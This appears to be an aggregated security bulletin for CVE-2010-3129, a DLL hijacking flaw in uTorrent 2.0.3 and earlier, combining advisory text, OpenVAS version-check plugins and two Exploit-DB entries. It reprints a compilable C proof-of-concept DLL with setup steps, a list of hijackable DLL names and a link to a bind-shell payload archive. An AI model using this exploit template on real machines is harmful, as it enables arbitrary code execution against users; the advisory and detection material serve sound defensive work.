KLA10424 ACE vulnerability in uTorrent

- ID: KLA10424
- Type: kaspersky
- Reporter: Kaspersky Lab
- Published: 2010-08-26T00:00:00
- Modified: 2020-06-18T00:00:00
- CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
- Source: https://threats.kaspersky.com/en/vulnerability/KLA10424

### *Detect date*:
08/26/2010

### *Severity*:
Critical

### *Description*:
An untrusted path vulnerability was found in uTorrent. By exploiting this vulnerability, malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a library hijack.

### *Affected products*:
uTorrent versions 2.0.3 and earlier

### *Solution*:
Update to latest version
[uTorrent](<http://www.utorrent.com/>)

### *Impacts*:
ACE

### *Related products*:
[uTorrent](<https://threats.kaspersky.com/en/product/uTorrent/>)

### *CVE-IDS*:
[CVE-2010-3129](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3129>) 9.3 Critical

### *Exploitation*:
The following public exploits exist for this vulnerability:

Records referenced by this bulletin:

- cve: CVE-2010-3129
- exploitdb: EDB-ID:14726, EDB-ID:14748
- openvas: OPENVAS:902240, OPENVAS:1361412562310902240
### *Related records*:

#### CVE-2010-3129 (NVD)

- Published: 2010-08-26T18:36:00
- Modified: 2017-09-19T01:31:00
- CVSS v2: 9.3 (HIGH), AV:N/AC:M/Au:N/C:C/I:C/A:C; exploitability score 8.6, impact score 10.0; user interaction required
- Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3129

Untrusted search path vulnerability in uTorrent 2.0.3 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse plugin_dll.dll, userenv.dll, shfolder.dll, dnsapi.dll, dwmapi.dll, iphlpapi.dll, dhcpcsvc.dll, dhcpcsvc6.dll, or rpcrtremote.dll that is located in the same folder as a .torrent or .btsearch file.

Per: http://cwe.mitre.org/data/definitions/426.html

CWE-426 - 'Untrusted Search Path Vulnerability'

#### OpenVAS: uTorrent File Opening Insecure Library Loading Vulnerability

Two versions of this plugin are recorded. Both were written by Antu Sanadi <santu@secpod.com>, Copyright (C) 2010 SecPod (http://www.secpod.com), and are licensed under the GNU General Public License version 2 (or any later version).

- Summary: uTorrent on this host is prone to insecure library loading vulnerability.
- Insight: The flaw is due to the application insecurely loading certain libraries from the current working directory, which could allow attackers to execute arbitrary code by tricking a user into opening a Torrent file.
- Impact: Successful exploitation will allow the attackers to execute arbitrary code and conduct DLL hijacking attacks. Impact Level: Application.
- Affected: uTorrent version 2.0.3 and prior
- Solution: Upgrade to uTorrent version 2.0.4 or later. For updates refer to http://www.utorrent.com/downloads
- CVSS base: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
- Creation date: 2010-09-01 09:34:36 +0200 (Wed, 01 Sep 2010)
- References: http://secunia.com/advisories/41051, http://www.exploit-db.com/exploits/14726/, http://www.vupen.com/english/advisories/2010/2164

OPENVAS:1361412562310902240 (OID 1.3.6.1.4.1.25623.1.0.902240), published 2010-09-01, last modified 2020-04-23 12:22:09 +0000, http://plugins.openvas.org/nasl.php?oid=1361412562310902240. Solution type VendorFix, QoD type registry, category ACT_GATHER_INFO, family General. It depends on gb_utorrent_detect_portable_win.nasl and requires the key utorrent/win/version. Detection logic:

```
include("smb_nt.inc");
include("version_func.inc");

# Version is taken from the knowledge base entry set by the detection plugin
uTorrentVer = get_kb_item("utorrent/win/version");

if(!uTorrentVer) exit(0);

# Report any installed version up to and including 2.0.3
if(version_is_less_equal(version:uTorrentVer, test_version:"2.0.3")) {
  report = report_fixed_ver(installed_version:uTorrentVer, vulnerable_range:"Less than or equal to 2.0.3");
  security_message(port: 0, data: report);
}

exit(0);
```

OPENVAS:902240 (script id 902240, `$Id: secpod_utorrent_insecure_lib_load_vuln.nasl 5401 2017-02-23 09:46:07Z teissa $`), published 2010-09-01, last modified 2017-02-23 10:46:07 +0100, http://plugins.openvas.org/nasl.php?oid=902240. QoD type registry, category ACT_GATHER_INFO, family General. It depends on secpod_reg_enum.nasl and requires the key SMB/WindowsVersion. Detection logic:

```
include("smb_nt.inc");
include("version_func.inc");

if(!get_kb_item("SMB/WindowsVersion")){
  exit(0);
}

key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\uTorrent\";
if(!registry_key_exists(key:key)){
  exit(0);
}

utName = registry_get_sz(key:key, item:"DisplayIcon");

## Check the name of the application
if("uTorrent" >< utName)
{
  ## Check for utorrent
  utVer = registry_get_sz(key: key, item:"DisplayVersion");
  if(utVer)
  {
    ## Check for uTorrent version 2.0.3 and prior
    if(version_is_less_equal(version:utVer, test_version:"2.0.3")){
      security_message(0) ;
    }
  }
}
```

#### Exploit-DB EDB-ID:14726: uTorrent <= 2.0.3 DLL Hijacking Exploit plugin_dll.dll

- Description: uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll). CVE-2010-3129. Local exploit for windows platform
- Published: 2010-08-24
- Reference: https://www.exploit-db.com/exploits/14726/
- Source: https://www.exploit-db.com/download/14726/
- CVSS: 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)

```c
/*
Exploit Title: uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)
Date: 24/08/2010
Author: TheLeader
Email: gsog2009 [a7] hotmail [d0t] com
Software Link: http://www.utorrent.com/downloads
Version: 2.0.3 and prior
Tested on: Windows 7 x86 (6.1.7600)

Compile and rename to plugin_dll.dll, create a file in the same dir with one of the following extensions:
.torrent / .btsearch

Double click & watch a nice calculator pop =]

A nice post about DLL Hijacking by Yam Mesicka (hebrew):
http://www.mesicka.com/dll-hijacking-windows-hd-moore/

@avivra: glad to provide entertainment for you guys =D

*Even more shouts* to all the great guys at forums.hacking.org.il
*/

#include <windows.h>
#include <stdlib.h>   /* exit() */
#define DLLIMPORT __declspec (dllexport)

int evil(void);       /* declared before first use */

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}
```

#### Exploit-DB EDB-ID:14748: uTorrent - DLL Hijacking Vulnerabilities

- Description: uTorrent DLL Hijacking Vulnerabilities. Local exploit for windows platform
- Published: 2010-08-25
- Reference: https://www.exploit-db.com/exploits/14748/
- Source: https://www.exploit-db.com/download/14748/
- CVSS: 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)

```
###########################################################################
#
# Title:      uTorrent <=2.0.3 Dll Hijacking Local Exploits
# By:         Dr_IDE
# Tested:     Windows 7RC
# Note:       These are additional DLL's with unsafe Load Paths
# Reference:  http://www.exploit-db.com/exploits/14726/
#
############################################################################

If the payload .DLL file is renamed to any of these files and placed in the
utorrent.exe directory, the payload will be executed with users' credentials.

    -userenv.dll
    -shfolder.dll
    -dnsapi.dll
    -dwmapi.dll
    -iphlpapi.dll
    -dhcpcsvc.dll
    -dhcpcsvc6.dll
    -rpcrtremote.dll

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz)

#[pocoftheday.blogspot.com]
```